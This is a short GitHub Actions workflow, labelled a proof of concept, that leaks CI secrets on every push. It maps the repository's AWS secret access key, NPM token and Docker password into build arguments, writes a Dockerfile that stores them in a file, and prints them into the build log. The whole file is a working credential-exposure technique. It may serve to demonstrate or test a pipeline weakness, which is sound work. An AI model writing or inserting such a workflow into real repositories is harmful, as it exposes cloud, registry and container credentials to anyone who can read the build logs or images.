name: Leak Secrets PoC

on:
  push:

jobs:
  leak-secrets:
    runs-on: ubuntu-latest
    env:
      FAKE_SECRET_1: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
      FAKE_SECRET_2: ${{ secrets.NPM_TOKEN }}
      FAKE_SECRET_3: ${{ secrets.DOCKER_PASSWORD }}
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Inject Dockerfile to Leak Secrets
      run: |
        echo 'FROM alpine' > Dockerfile
        echo 'ARG FAKE_SECRET_1' >> Dockerfile
        echo 'ARG FAKE_SECRET_2' >> Dockerfile
        echo 'ARG FAKE_SECRET_3' >> Dockerfile
        echo 'RUN echo "SECRET1=$FAKE_SECRET_1" >> /leaked && echo "SECRET2=$FAKE_SECRET_2" >> /leaked && echo "SECRET3=$FAKE_SECRET_3" >> /leaked' >> Dockerfile
        echo 'RUN cat /leaked' >> Dockerfile
        docker build --build-arg FAKE_SECRET_1=$FAKE_SECRET_1 \
                     --build-arg FAKE_SECRET_2=$FAKE_SECRET_2 \
                     --build-arg FAKE_SECRET_3=$FAKE_SECRET_3 \
                     -t secrets-leak .
